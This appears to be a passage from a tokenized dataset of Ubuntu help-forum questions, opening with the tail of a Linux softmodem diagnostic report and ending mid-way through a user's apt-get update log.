00:1b.0 , firmware information and bootup diagnostics are : pci slot pci id subsystemid name -- -- -- -- -- -- -- -- -- - -- -- -- -- - -- -- -- -- -- -- -- 00:1b.0 8086:293e 1025:0260 audio device : intel corporation 82801i modem interrupt assignment and sharing : 45 : 915 924 pci-msi-edge snd_hda_intel -- - bootup diagnostics for card in pci slot 00:1b.0 -- -- [ 0.521283 ] pci 0000:00:1b.0 : [ 8086:293e ] type 00 class 0x040300 [ 0.521301 ] pci 0000:00:1b.0 : reg 0x10 : [ mem 0xd6700000-0xd6703fff 64bit ] [ 0.521378 ] pci 0000:00:1b.0 : pme # supported from d0 d3hot d3cold [ 0.521431 ] pci 0000:00:1b.0 : system wakeup disabled by acpi [ 19.294210 ] snd_hda_intel 0000:00:1b.0 : irq 45 for msi/msi-x [ 19.415877 ] input : hda intel hdmi/dp , pcm=3 as /devices/pci0000:00/0000:00:1b.0/sound/card0/input7 [ 19.416160 ] input : hda intel headphone as /devices/pci0000:00/0000:00:1b.0/sound/card0/input8 [ 19.418470 ] input : hda intel line as /devices/pci0000:00/0000:00:1b.0/sound/card0/input9 [ 19.418755 ] input : hda intel mic as /devices/pci0000:00/0000:00:1b.0/sound/card0/input10 the pci slot 00:1b.0 of the modem card may be disabled early in a bootup process , but then enabled later . if modem drivers load but the modem is not responsive , read docs/bootup.txt about possible fixes . send dmesg.txt along with modemdata.txt to discuss @ linmodems.org if help is needed . ===== advanced linux sound architecture ( alsa ) diagnostics ===== the alsa packages provide audio support and also drivers for some modems . alsa diagnostics are written during bootup to /proc/asound/ folders . the modem cards detected by `` aplay -l '' are : none the /proc/asound/pcm file reports : -- -- -- -- -- -- -- -- -- -- -- - 00-00 : alc888 analog : alc888 analog : playback 1 : capture 1 00-01 : alc888 digital : alc888 digital : playback 1 00-03 : hdmi 0 : hdmi 0 : playback 1 about /proc/asound/cards : -- -- -- -- -- -- -- -- -- -- -- -- 0 [ intel ] : hda-intel - hda intel hda intel at 0xd6700000 irq 45 pci slot 00:1b.0 has a high definition audio card the drivers are in the kernel modules tree at : /lib/modules/3.11.0-17-generic/kernel/sound/pci/hda/snd-hda-intel.ko /lib/modules/3.11.0-15-generic/kernel/sound/pci/hda/snd-hda-intel.ko /lib/modules/3.11.0-12-generic/kernel/sound/pci/hda/snd-hda-intel.ko the modem codec file for the hda card is : /proc/asound/card0/codec # 1 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- codec : lsi id 1040 address : 1 mfg function id : 0x2 ( unsol 1 ) vendor id : 0x11c11040 subsystem id : 0x10250260 revision id : 0x100200 modem function group : 0x1 the audio card hosts a softmodem chip : 0x11c11040 the softmodem chip 11c11040 is hosted on the subsytem of the high definition audio card , and is supported by the ageresystems/lsi driver pair agrmodem + agrserial , which is provided by the most current package agrsm-11c11040-version at http : //linmodems.technion.ac.il/packages/ltmodem/11c11040/ if not a conexant modem , the driver agrsm with its dependent drivers : -- -- -- -- -- provide audio + modem support with the modem chip residing on the subsystem . any particular card can host any one of several soft modem chips . === finished firmware and bootup diagnostics , next deducing cogent software . === predictive diagnostics for card in bus 00:1b.0 : modem chipset detected on name= '' audio device : intel corporation 82801i `` class=0403 pcidev=8086:293e subsys=1025:0260 irq=45 hda2=00:1b.0 soft=8086:293e.hda hdachipvendorid=11c1 chip=0x11c11040 ident=agrsm driver=agrsm package=agrsm-11c11040 for candidate modem in : 00:1b.0 0403 audio device : intel corporation 82801i primary device id : 8086:293e subsystem pci_id 1025:0260 softmodem codec or chipset from diagnostics : 0x11c11040 from archives : the hda card softmodem chip is 0x11c11040 support type needed or chipset : agrsm writing docs/intel.txt there is no agrsm software support for x86_64 systems , through the modem may be supported on intel/i386 installations , which do more slowly servce x86_64 processors . the ageresystems/lsi agrsm code supports compiling of a agrmodem + agrserial driver pair . there are a few different chipsets which use this driver pair , but they use different code resources : chipsets kv* packagenames ( most current as of november 2009 ) -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 11c1:048c and 11c1:048f 2.6.29 agrsm048pci-2.1.60_20100108_i386.deb or agrsm048pci-2.1.60_20100108.tar.gz 11c1:0620 2.6.31 agrsm06pci-2.1.80_20100106_i386.deb or agrsm06pci-2.1.80~20100106.tar.gz ! ! 11c11040 ( on hda audio cards ) 2.6.31 agrsm-11c11040_20091225_i386.deb or agrsm-11c11040-2.1.80~20091225.tar.bz2 ! ! all available at : http : //linmodems.technion.ac.il/packages/ltmodem/11c11040/ additionally there are ; automation & testing agrsm-tools_0.0.1_all.deb or agrsm-tools-0.0.1-2.noarch.rpm general background agrsm_howto.txt -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- * kv == latest kernel release with a reported success ! ! latest update with major credit to nikolay zhuravlev but see conflict issue : http : //linmodems.technion.ac.il/bigarch/archive-nineth/msg02753.html for the 11c11040 chip with kernels 2.6.31 and later a change in a modules loading settingmay be necessary . within the file /etc/modprobe.d/alsa-base.conf ( or equivalent for your distro ) , change the phrase : options snd-hda-intel power_save=10 to : options snd-hda-intel power_save=0 or the agrsm drivers will not function . for ubuntu related systems this can be done with : $ sudo gedit /etc/modprobe.d/alsa-base.conf report from bjorn wielens : please note- trying to load the modules on a opensuse 11.2 system gives an error about the module_version symbol . using : # modprobe -- force agrmodem # modprobe -- force agrserial is necessary to load the drivers , and does not appear to cause ill effects . all of the above packages are dkms competent . this means that if your linux distros dkms package is previously installed , if provides for future updates matching forthcoming kernels . -- -- -- -- -- -- -- end agere systems section -- -- -- -- -- -- -- -- -- - completed candidate modem analyses . the base of the udev device file system is : /dev/.udev versions adequately match for the compiler installed : 4.8.1 and the compiler used in kernel assembly : 4.8 linux-headers-3.11.0-17-generic resources needed for compiling are not manifestly ready ! if compiling is necessary packages must be installed , providing : linux-headers-3.11.0-17-generic if a driver compilation fails , with message including some lack of some filename.h ( stdio.h for example ) , then some additional kernel-header files need installation to /usr/include . the minimal additional packages are libc6-dev and any of its dependents , under ubuntu linux-libc-dev if an alternate ethernet connection is available , $ apt-get update $ apt-get -s install linux-kernel-devel will install needed packages . for debian/ubuntu related distributions , run the following command to display the needed package list : otherwise packages have to be found through http : //packages.ubuntu.com once downloaded and transferred into a linux partition , they can be installed alltogether with : $ sudo dpkg -i *.deb checking pppd properties : -rwsr-xr -- 1 root dip 343168 jan 23 2013 /usr/sbin/pppd in case of an `` error 17 '' `` serial loopback '' problem , see : http : //linmodems.technion.ac.il/linmodems/archive-sixth/msg02637.html to enable dialout without root permission do : $ su - root ( not for ubuntu ) sudo chmod a+x /usr/sbin/pppd or under ubuntu related linuxes sudo chmod a+x /usr/sbin/pppd checking settings of : /etc/ppp/options asyncmap 0 noauth crtscts lock hide-password modem lcp-echo-interval 30 lcp-echo-failure 4 noipx in case of a message like : warning : could not modify /etc/ppp/pap-secrets : permission denied see http : //linmodems.technion.ac.il/bigarch/archive-sixth/msg04656.html for guidance on fax usage , get from http : //linmodems.technion.ac.il/packages/ get faxing.tar.gz it has samples for a modem using port /dev/ttysl0 , which must be changed to match your modem 's port . read modem/docs/yoursystem.txt concerning other comm channels : eth0 which can interfere with browser naviagation . do n't worry about the following , it is for experts should trouble shooting be necessary . ========================================================== checking for modem support lines : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- /device/modem symbolic link : slmodemd created symbolic link /dev/ttysl0 : within /etc/udev/ files : within /etc/modprobe.conf files : /etc/modprobe.d/alsa-base.conf : options snd-atiixp-modem index=-2 /etc/modprobe.d/alsa-base.conf : options snd-via82xx-modem index=-2 /etc/modprobe.d/blacklist-modem.conf : # uncomment these entries in order to blacklist unwanted modem drivers /etc/modprobe.d/blacklist-modem.conf : # blacklist snd-atiixp-modem /etc/modprobe.d/blacklist-modem.conf : # blacklist snd-via82xx-modem within any ancient /etc/devfs files : within ancient kernel 2.4.n /etc/module.conf files : -- -- -- -- - end modem support lines -- -- -- --
447299	how do i install pinta ?	i ordered a new computer with windows 8 to test before rolling out . it arrived with ubuntu 12.04 . rather then just send it back , i decided to check it out first as i think the system is probably much better than the ms options . however , try as i might , i can not get a ppa set up . i 'm trying to install pinta-paint but ca n't find the line to copy into the software centre . please could someone point me in the right direction .
447311	which recognized flavors of ubuntu have been granted the lts status for 14.04 ?	the recognized flavors of ubuntu as of 14.04 release are : edubuntu - ubuntu for education ubuntu gnome - ubuntu with a pure gnome desktop kubuntu - ubuntu with the kde desktop environment ubuntukylin - ubuntu localised for china lubuntu - ubuntu that uses lxde mythbuntu - designed for creating a home theatre pc with mythtv ubuntu studio - designed for multimedia editing and creation xubuntu - ubuntu with the xfce desktop environment we know that ubuntu 14.04 is an lts release with 5 years of support . which of these recognized flavors have been granted the lts status for 14.04 ? and , for what duration ?
447313	ubuntu 12.04 not booting ( black screen ) after pendrive-installation	let me get this straight . here is what i did : downloaded ubuntu 12.04 lts 64bit created live usb from pendrive linux website booted from the live usb smoothly inserted a 16gb pendrive choose to install ubuntu to that pendrive installed bootloader to sdd/sdd1 the problem is that ubuntu wo n't start after installation is complete . it stops on a blank screen with _ on top left screen or with an error : operating system not found
447315	how to boot extracted ubuntu iso	internet , i have a flash drive that has multiple extracted ubuntu iso on it and is formatted as exfat . i am creating this drive to be a universal installation platform . it will have multiple linux distributions on it and microsoft oss . it essentially has two boot loaders : windows 8 and grub4dos . the windows 8 loader is for booting into pe images that i have made and loading grub4dos so i can boot from the linux distributions isos . the reason that the fs is exfat is because i have a large file ( ~8gb ) and i hear that ntfs will not work with linux properly . the grub4dos loader was created by easybcd ( neogrub ) . the issue that i am having is that i ca n't seem to figure out how to boot from the ubuntu files . i have ubuntu server , desktop and gnome . how do you configure grub4dos to boot from the extracted ubuntu isos ?
447316	how to use swift ?	i have installed openstack using devstack and installed swift using saio installation now i want to use swift 's services . i tried this command curl -v -h 'x-storage-user : swift ' -h 'x-storage-pass : mani ' http : //127.0.0.1:8081/auth/v1.0 but i am getting error http/1.1 401 unauthorized ... . i want to know how do i use swift and http : //127.0.0.1:8081/auth/v1.0 is keystone 's ip or what ?
447319	migrating from windows xp to ubuntu	i have a 5 year old notebook computer . it uses windows xp , and as you might know , this os now has no support at all . it has a 1.60ghz , 0.98gb of ram . what would you guys recommend me , in order for me to happily migrate from windows xp to ubuntu program . i appreciate in advance any help you can provide me regarding this matter . regards
447320	aceessing a webserver on aws ec2 instance with custom nameservers ?	i tried to run a web server on amazon 's ec2 instance . when i quired it through elastic-ip of instance it resolved perfectly , but whenver i am tried to do a nslookup or try to access via custom domain name , i am unable to do so . i already turned off the iptables and added the ports in security groups of instance . the problem is want to resolve the domain name through a custom name-server . when i try to check the domain name via intodns it resolves perfectly and returned the name of custom name-servers . so how can point the domain name to my instance ? ?
447321	no gui after install	this question has been asked in here before : unity does n't load , no launcher , no dash appears but none of the answers solved my issue . in the compizconfig-settings-manager unity and opengl are enabled . after failing to install ubuntu ( and fedora ) as a standalone os on my system ( boots into a black screen ) , i decided to install windows 8 and install ubuntu as a virtual machine . however , even this seems impossible . after installing ubuntu , the system asks me to restart . when i click restart , it crashes on the following screen : i shutdown the virtual machine and launch again , i end up in ubuntu without a gui : i tried re-installing 3 times already , but the result is always the same . i guess it 's a video driver issue . any help will be appreciated . edit : the machine has a pentium n3520 soc with intel hd graphics . more info can be found here : http : //www.notebookcheck.net/intel-pentium-n3520-notebook-processor.108993.0.html
447322	how do i run popcorn-time / flixtor	i downloaded the .tar.gz and extracted the files to desktop . i clicked on popcorn-time / flixtor but nothing opens . i allowed `` run as executable '' , and tried running from terminal ( gives me `` file not found error '' )
447326	what was the first version of ubuntu and where can i find it ?	this wiki page lists ubuntu 4.10 ( warty warthog ) as the first ubuntu released by canonical ltd . but i wanted to know whether there ever was an ubuntu 1.x , as in windows or mac os . if yes , is it available somewhere ?
447332	wrong key behavior	i am encountering a very weird error recently , that i can not figure out to solve ... i have surfed for hours and hours without any solution . i explain : i have an asus s301l , with ubuntu 12.04 and an italian keyboard ; every time i log in , some key on my keyboard does not work properly : p priduces * 0 produces / produces + but also others ... for example , it took time for me to write just this message ... so frustrating sometimes . the only way to have things again to work properly is to type from a terminal : setxkbmap it that command takes a keyboard layout configuration from the folder /usr/share/x11/xkb/symbols/ and it starts again to work , just for a ( indefinite ) duration of time , then , things , again , are wrong . the output of the locale command is : lang=en_us.utf-8 language=en_us : en lc_ctype= '' en_us.utf-8 '' lc_numeric=it_it.utf-8 lc_time=it_it.utf-8 lc_collate= '' en_us.utf-8 '' lc_monetary=it_it.utf-8 lc_messages= '' en_us.utf-8 '' lc_paper=it_it.utf-8 lc_name=it_it.utf-8 lc_address=it_it.utf-8 lc_telephone=it_it.utf-8 lc_measurement=it_it.utf-8 lc_identification=it_it.utf-8 lc_all= i hope to be clear and have explained my problem . anyone can help me ? thanks in advance for all the answers you 'll give me cheers g .
447336	can i recompile kernel in dualboot environment ?	i need to fix a value hid-ids.h and compile kernel so that my device will work . but i 'm on dualboot with windows 8 . if this goes wrong can it damage grub or will this just affect my ubuntu installation ?
447337	ca n't see grub after running boot repair . please help !	i 've a machine with windows 8 and i 've just upgraded from windows 8 to windows 8.1 . after this i could n't see the grub while booting . so , i ran boot repair , but still it did n't work . http : //paste.ubuntu.com/7245690 note : secure boot is disabled . please help ! thanks !
447339	how to delete broken download package ?	i wanted to install eclipse from the software center on 12.04 , after download the software center shows an error and said something like `` connection broke '' ( i do not remember the exact error ) . also , dpkg -l | grep eclipse , returns nothing . when i type locate eclipse i see this : /usr/share/app-install/desktop/eclipse-platform : eclipse.desktop /usr/share/app-install/desktop/redeclipse : redeclipse.desktop /usr/share/app-install/icons/eclipse.png /usr/share/app-install/icons/redeclipse.png /usr/share/xml/docbook/stylesheet/docbook-xsl/eclipse /usr/share/xml/docbook/stylesheet/docbook-xsl/eclipse/eclipse.xsl /usr/share/xml/docbook/stylesheet/docbook-xsl/eclipse/eclipse3.xsl /usr/share/xml/docbook/stylesheet/docbook-xsl/eclipse/profile-eclipse.xsl also the first one 's size is less than 1 mb . i want to delete the broken package but i do n't know where it is .
447342	13.10 , mount works only in read-only mode	no success mounting a device in read-write mode . after plugging it in , it is mounted . $ sudo lsblk -o name , fstype , size , mountpoint , label name fstype size mountpoint label sda 238,5g ├─sda1 ext4 230,6g / ├─sda2 1k └─sda5 swap 7,9g [ swap ] sdb 931,5g ├─sdb1 vfat 200m efi └─sdb2 hfsplus 931,2g /media/cr/finnhard finnhard sr0 1024m $ sudo mount -o remount , rw '/media/cr/finnhard' mount : /media/cr/finnhard not mounted or bad option $ sudo umount /media/cr/finnhard $ sudo mount -t hfsplus -o rw /dev/sdb2 '/media/finnhard' mount : warning : /media/finnhard seems to be mounted read-only . what am i doing wrong ?
447345	which is the location of `` file '' command ?	when we check the file type , we use file command to do it . i guess that file command is a binary . so , i look in bin folder for it , which i did n't find . the question is if it 's a binary , where is that binary located ?
447352	ca n't boot after kubuntu 13.10 installation with windows 8 dual boot	i installed kubuntu 13.10 with dual boot windows 8.1 via usb . after reboot i got the prompt : minimal bash-like line editing is supported i already tried to fix it with boot-repair , but nothing changes . the output of boot-repair is : paste.ubuntu.com/7245898 any ideas what 's wrong ? thanks !
447354	grub legacy to grub2	i 've spend couple of hours with this but with no results ... i got windows 8 and i installed ubuntu 13 . boot menu was showing , but when i tried to pick windows 7 loader , i got 'disk read error occured' so i did a research and found boot-repair . i tried to run it with default settings and after that i 've lost access to any operating system ( there was a blinking _ ) so i 've made a research again and tried to install `` grub legacy '' again from boot-repair tool . but id did n't showed windows 8 - and i did n't liked it ( grub2 looks better : ) ) so i tried again to run boot-repair with default options , but now it seems that it does not delete grub legacy , because when i 'm starting system i 'm getting '' error 15 '' ( which comes from grub legacy ? ) . please , help me configure grub2 loader so i can run ubuntu and windows 8 . i have no idea what can i do now . thanks ...
447355	wired lan conncetion not working , but router says i am connected	i already looked for other questions maybe answering this , but nothing really seems to apply here . after a fresh install of 12.04 , i ca n't get a wired connection established . wlan works fine . what really surprises me is that my router interface shows that i am connected over lan . so how do i find out whats wrong here ? do n't know where to look further , but here is some relevant inforamation . ( to be exact regarding the history of this : i had a working installation of 12.04 before , then i got problems with the networking a day ago , and there was wlan and lan affected . after some attempts to fix this , i decided to do a fresh install . but now i am stuck in this situation , which is basically better because now i am at least able to connect over wifi . ) $ ifconfig eth0 link encap : ethernet hardware adresse 20 : cf:30:67:3f:5f inet6-adresse : fe80 : :22cf:30ff : fe67:3f5f/64 gültigkeitsbereich : verbindung up broadcast running multicast mtu:1500 metrik:1 rx-pakete:0 fehler:0 verloren:0 überläufe:0 fenster:0 tx-pakete:791 fehler:0 verloren:0 überläufe:0 träger:1 kollisionen:0 sendewarteschlangenlänge:1000 rx-bytes:0 ( 0.0 b ) tx-bytes:163547 ( 163.5 kb ) $ nmcli dev list iface eth0 general.gerät : eth0 general.typ : 802-3-ethernet general.hersteller : atheros communications inc. general.produkt : ar8131 gigabit ethernet general.treiber : atl1c general.hwaddr : 20 : cf:30:67:3f:5f general.status : 30 ( nicht verbunden ) general.grund : 0 ( kein grund angegeben ) general.udi : /sys/devices/pci0000:00/0000:00:1c.5/0000:05:00.0/net/eth0 general.ip-iface : general.nm-verwaltet : ja general.firmware-fehlt : nein general.verbindung : nicht verbunden capabilities.trägerfrequenzerkennung : ja capabilities.geschwindigkeit : 100 mb/s wired-properties.trägerfrequenz : an
447356	how to find the difference between a script file and a binary file ?	$ ls -l /usr/bin total 200732 -rwxr-xr-x 1 root root 156344 oct 4 2013 adb -rwxr-xr-x 1 root root 6123 oct 8 2013 add-apt-repository list goes long -- -- -- -- - in the above adb is a binary file and add-apt-repository is a script file.i get this information by viewing the files through nautilus.but through command line , i did n't find any differences.i am not able to predict whether a file is binary file or a script file . so how do i differentiate between script and binary files through the command-line ?
447359	ubuntu server : boot messages on terminal 7 ( video ) why ?	i use only text terminals in ubuntu server . especially at boot time : ) i 've turned off plymouth splash screen and i get boot messages on terminal 1 . but after couple of messages , active terminal is swiching to terminal 7 . ( then messages with fsck and * starting and * stopping services ) and then i 'm switched back to terminal 1 with login prompt . why ? i wan to to see all messages on terminal 1 . why video terminal is even loaded ? why messages are displayed there ? how to display everything on 1st terminal ?
447363	why does n't the ubuntu installer recognize i have windows 8 installed ?	when trying to install ubuntu alongside windows 8 , and selecting 'something else ' to create my partition , it says my hard drive with windows already installed on it as free space . why does this happen and how do i fix it ?
447368	pxe boot with ubuntu 14.04	i 'm currently having a pxe server to perform many different os ' installation over the network . i have a fully functionnal ubuntu 13.10 live environnement and i would like to give a try on 14.04 ( using latest daily image ) . but with 14.04 , using exactly the same directory structure and access rights , same pxelinux.cfg/default file entry ( see below ) the boot hangs and stops with a kernel panic error any ideas ? i almost searched , googled everywhere without finding any clue ... my pxelinux.cfg/default file : label ubuntu 13.10 live kernel images/ubuntu/casper/vmlinuz.efi append boot=casper vga=normal rootfstype=nfs netboot=nfs nfsroot=192.168.xx.xx : /volume1/tftpboot/images/ubuntu fetch=tftp : //192.168.xx.xx/tftpboot/images/ubuntu/casper/filesystem.squashfs ramdisk_size=1048576 debian-installer/language=fr console-setup/layoutcode=fr console-setup/variantcode=oss quiet splash initrd=images/ubuntu/casper/initrd.lz -- label ubuntu 14.04 live kernel images/ubuntu14/casper/vmlinuz.efi append boot=casper vga=normal rootfstype=nfs netboot=nfs nfsroot=192.168.xx.xx : /volume1/tftpboot/images/ubuntu14 fetch=tftp : //192.168.xx.xx/tftpboot/images/ubuntu14/casper/filesystem.squashfs ramdisk_size=1048576 debian-installer/language=fr console-setup/layoutcode=fr console-setup/variantcode=oss quiet splash initrd=images/ubuntu/casper/initrd.lz -- thanks in advance for your thoughts ( and solutions with a little luck )
447369	should ubuntu 's battery icon warn me that my battery is on its way out ?	i 'm using ubuntu 13.04 on an older toshiba satellite and for a while now , the battery has done nothing but drain . i knew when i got the laptop that the battery would need to be replaced within short order , so it 's not a surprise - however , i 've been watching it steadily fall from 100 % to hold steady at 6 % for weeks , with no apparent warnings from the os . today it sits at a pithy 1 % . no aspect of the power statistics window ( clicking the `` battery : 1 % '' option under the battery icon ) indicates that something somewhere might be out of whack . as i said , i had anticipated that i 'd need to replace the battery soon , but i also figured i 'd get some kind of note from ubuntu that there could be an issue . if i did n't have the power icon on my menu , and i did not realize the history of the laptop , i might not have noticed that this was even happening . did i simply miss a preference somewhere , or is this a genuine issue ? edit : indeed per the accepted answer , installing and using acpi outputs the following : stick @ computer : ~ $ acpi -bi battery 0 : unknown , 0 % battery 0 : design capacity 4500 mah , last full capacity 1520 mah = 33 % so it goes - no driver , no ride . update : it turns out the question was misread . perhaps i was unclear in my asking , as well . to be clear - i do n't necessarily mean a giant popup stating `` battery over '' or anything ; however , it seems not-entirely-unreasonable to expect the output from the battery indicator to say `` not charging '' if the battery is , well , not charging . at present it simply says `` charging ( 1 % ) '' , when clearly it is not . i 'm not the sharpest beer in the shed , but i can tell when my battery is slowly degrading over time . however , admittedly , i only knew that the slow death had begun because the light on my laptop that indicates the battery is charging no longer came on . i then noticed that ubuntu 's indication that the battery was `` charging '' was incorrect . i know that windows will at least modify the visible icon to show that there is a charging issue with the battery . this is what i mean by `` warning '' - i do n't think i need a big popup , but even just a battery with a : ( next to it would be a pleasant indicator that something is borked . and here again , a popup which clearly states that it is not charging . again - i can put 2 and 2 together to suss it out for myself , but it 'feels like an oversight ' , and i wanted to ensure that there was not a preference or setting that maybe i inadvertently turned off that was preventing me from seeing said icon in my laptop window . so did i in fact do this to myself , or is there a separate issue at play ?
447370	cant boot into ubuntu install	so i am trying to install ubuntu , i had it before but i removed it because i could n't re install it , i thought it would work but it did n't . so i cant boot into the install anymore , it says : syslinux ( not sure the number ) edd 4.06-pre7 copyright ( c ) 1994-2012 h. peter anvin et al i am trying to boot from a pny usb flash drive , i know its not the usb because i used this to boot into it brfore also i cant boot into any other linux distro either , so can someone please reply ?
447371	/usr/bin/file from ubuntu 32-bit arm	i want `` file '' binary which is usually located at /usr/bin/ . i want it from 32-bit arm . i got only 64-bit ubuntu installed on my computer . can someone please upload me that binary ? thanks in advance
447374	installation instructions for opendocman in ubuntu 12.04	how to use opendocman in ubuntu ? ? is there any complete guide on how to install it ? ?
447379	12.04 will not install on xp/dell dimension e310	dell dimension e310 with xp sp3 ; 2gb ram ; 2 partitions already ; pentium 4 ; nvidia geforce 8500 video card installed with the board video controller disabled . each partition has right at 35 gb . i purchased five 12.04 cd 's from canonical . the first one i tried is empty ! ! ! does not show anything on 3 different cd drives . the 2nd one i tried kept rebooting my machine before it ever got to the ubuntu screen . the next 3 cd 's go into the reboot cycle when i choose to try before install or install . i was able to run the memory test from the ubuntu menu , but that is the only thing that works correctly from the menu . i also opened the autorun.inf file and that eventually goes to rebooting before ever reaching the install menu . using wubi.exe goes into the reboot cycle at the ubuntu install menu . it would be really nice if someone can tell me what is going on and how i go about getting a replacement for my empty cd ? ? ? ? ? ?
447380	steam incorrect password message	i am trying to run steam , however when it asks for my password , no matter what , i get an incorrect password message . i even tried resetting my password , and that did nothing .
447381	it is not supported to create click packages for a non ubuntusdk target	i 've just finished a first version of my app port to qml and tried to create a click package but ubuntu sdk said wrong kit type it is not supported to create click packages for a non ubuntusdk target my project is of type qml extension library + tabbed ui and i 've removed networking from policies . how can i create the package ? click build . does n't really work .
447382	command to find how much data was transferred from usb	how can i create a cron job that runs every minute and logs how much data was transferred by usb ? ideally i want log of amount the data in bytes transfers done . for example if i tranferred 4mb file from my pendrive to my computer system , and then 1 gb file from my computer system to pendrive , it should log all this .
447383	netgear wnda3100v2 taking forever to establish wi-fi connection	i got my netgear n600 wnda3100v2 set up as described here : unable to get wireless netgear wnda3100v2 to work however , i 've been having problems establishing the wi-fi connection . basically it takes anywhere between 2 to 10 minutes to to connect after a reboot . things seem smooth once the connection gets established . here is my iwconfig output . wlan0 ieee 802.11g essid : '' qwest6144 '' mode : managed frequency:2.427 ghz access point : 00:23:75:26:66:20 bit rate=54 mb/s tx-power:32 dbm rts thr:2347 b fragment thr:2346 b power management : off link quality:100/100 signal level : -28 dbm noise level : -96 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:77 invalid misc:40921 missed beacon:0
447384	empathy wont connect to facebook	when i try adding facebook in online accounts it gives me is there any way to fix this problem ?
447385	no console after removing ubuntu-desktop from ubuntu server	i have an ubuntu server and i decided to install sudo aptitude install -- without-recommends ubuntu-desktop but when i removed it i can no longer get a terminal from the server . it is just stuck at `` ubuntu 13.10 '' loading screen . any idea on how to get the terminal back ?
447386	shutdown process	i installed ubuntu this morning , and so far loving it . i just have one problem tho . when i try to shut the computer down , it just stays at the ubuntu loading screen . it just stays for a countless period . what should i do ? thanks .
447387	getting frustrated trying to update r-base	i 've read through similar questions/guides : a similar question on au - installing latest version of r-base the guide from cran on updating in ubuntu - http : //cran.r-project.org/bin/linux/ubuntu/readme i 'm guessing there are some general assumptions i am missing from the instructions they are giving because i 'm coming out lost . question 1 : i 'm running 12.04 so going off the guide from cran should i put deb http : //cran.rstudio.com/bin/linux/ubuntu quantal/ in etc/apt/sources.list ? can it go on any empty line or is there an order i need to follow ? question 2 : when i follow the next step in the cran guide , i do an update and install . i am following the guide as i understand it but there are 'thistles in my socks ' . i do n't know what is wrong . i 'm still loading in to 2.14 when i load into r. xxxxxxxxxxxxxxx : ~ $ sudo apt-get update ign http : //cran.cnr.berkeley.edu quantal/ release.gpg hit http : //security.ubuntu.com precise-security release.gpg hit http : //us.archive.ubuntu.com precise release.gpg get:1 http : //us.archive.ubuntu.com precise-updates release.gpg [ 198 b ] get:2 http : //us.archive.ubuntu.com precise-backports release.gpg [ 198 b ] ign http : //cran.cnr.berkeley.edu quantal/ release hit http : //security.ubuntu.com precise-security release hit http : //us.archive.ubuntu.com precise release hit http : //extras.ubuntu.com precise release.gpg get:3 http : //us.archive.ubuntu.com precise-updates release [ 49.6 kb ] hit http : //security.ubuntu.com precise-security/main sources hit http : //extras.ubuntu.com precise release hit http : //security.ubuntu.com precise-security/restricted sources hit http : //security.ubuntu.com precise-security/universe sources hit http : //security.ubuntu.com precise-security/multiverse sources hit http : //security.ubuntu.com precise-security/main amd64 packages hit http : //security.ubuntu.com precise-security/restricted amd64 packages hit http : //security.ubuntu.com precise-security/universe amd64 packages hit http : //security.ubuntu.com precise-security/multiverse amd64 packages hit http : //security.ubuntu.com precise-security/main i386 packages hit http : //security.ubuntu.com precise-security/restricted i386 packages hit http : //security.ubuntu.com precise-security/universe i386 packages get:4 http : //us.archive.ubuntu.com precise-backports release [ 49.6 kb ] hit http : //security.ubuntu.com precise-security/multiverse i386 packages hit http : //security.ubuntu.com precise-security/main translationindex hit http : //security.ubuntu.com precise-security/multiverse translationindex hit http : //security.ubuntu.com precise-security/restricted translationindex hit http : //security.ubuntu.com precise-security/universe translationindex hit http : //extras.ubuntu.com precise/main sources hit http : //us.archive.ubuntu.com precise/main sources hit http : //us.archive.ubuntu.com precise/restricted sources hit http : //us.archive.ubuntu.com precise/universe sources hit http : //us.archive.ubuntu.com precise/multiverse sources hit http : //us.archive.ubuntu.com precise/main amd64 packages ign http : //ppa.launchpad.net precise release.gpg hit http : //us.archive.ubuntu.com precise/restricted amd64 packages hit http : //us.archive.ubuntu.com precise/universe amd64 packages hit http : //us.archive.ubuntu.com precise/multiverse amd64 packages hit http : //us.archive.ubuntu.com precise/main i386 packages hit http : //security.ubuntu.com precise-security/main translation-en hit http : //security.ubuntu.com precise-security/multiverse translation-en hit http : //security.ubuntu.com precise-security/restricted translation-en hit http : //extras.ubuntu.com precise/main amd64 packages hit http : //extras.ubuntu.com precise/main i386 packages ign http : //extras.ubuntu.com precise/main translationindex hit http : //us.archive.ubuntu.com precise/restricted i386 packages hit http : //us.archive.ubuntu.com precise/universe i386 packages hit http : //us.archive.ubuntu.com precise/multiverse i386 packages hit http : //us.archive.ubuntu.com precise/main translationindex hit http : //us.archive.ubuntu.com precise/multiverse translationindex hit http : //us.archive.ubuntu.com precise/restricted translationindex hit http : //security.ubuntu.com precise-security/universe translation-en ign http : //ppa.launchpad.net precise release hit http : //us.archive.ubuntu.com precise/universe translationindex get:5 http : //us.archive.ubuntu.com precise-updates/main sources [ 454 kb ] ign http : //ppa.launchpad.net precise/main translationindex get:6 http : //us.archive.ubuntu.com precise-updates/restricted sources [ 8,028 b ] get:7 http : //us.archive.ubuntu.com precise-updates/universe sources [ 106 kb ] err http : //cran.cnr.berkeley.edu quantal/ packages 404 not found err http : //ppa.launchpad.net precise/main sources 404 not found err http : //ppa.launchpad.net precise/main amd64 packages 404 not found err http : //ppa.launchpad.net precise/main i386 packages 404 not found ign http : //cran.cnr.berkeley.edu quantal/ translation-en_us ign http : //extras.ubuntu.com precise/main translation-en_us ign http : //cran.cnr.berkeley.edu quantal/ translation-en get:8 http : //us.archive.ubuntu.com precise-updates/multiverse sources [ 8,909 b ] ign http : //extras.ubuntu.com precise/main translation-en get:9 http : //us.archive.ubuntu.com precise-updates/main amd64 packages [ 764 kb ] ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en get:10 http : //us.archive.ubuntu.com precise-updates/restricted amd64 packages [ 12.2 kb ] get:11 http : //us.archive.ubuntu.com precise-updates/universe amd64 packages [ 239 kb ] get:12 http : //us.archive.ubuntu.com precise-updates/multiverse amd64 packages [ 15.3 kb ] get:13 http : //us.archive.ubuntu.com precise-updates/main i386 packages [ 788 kb ] get:14 http : //us.archive.ubuntu.com precise-updates/restricted i386 packages [ 12.2 kb 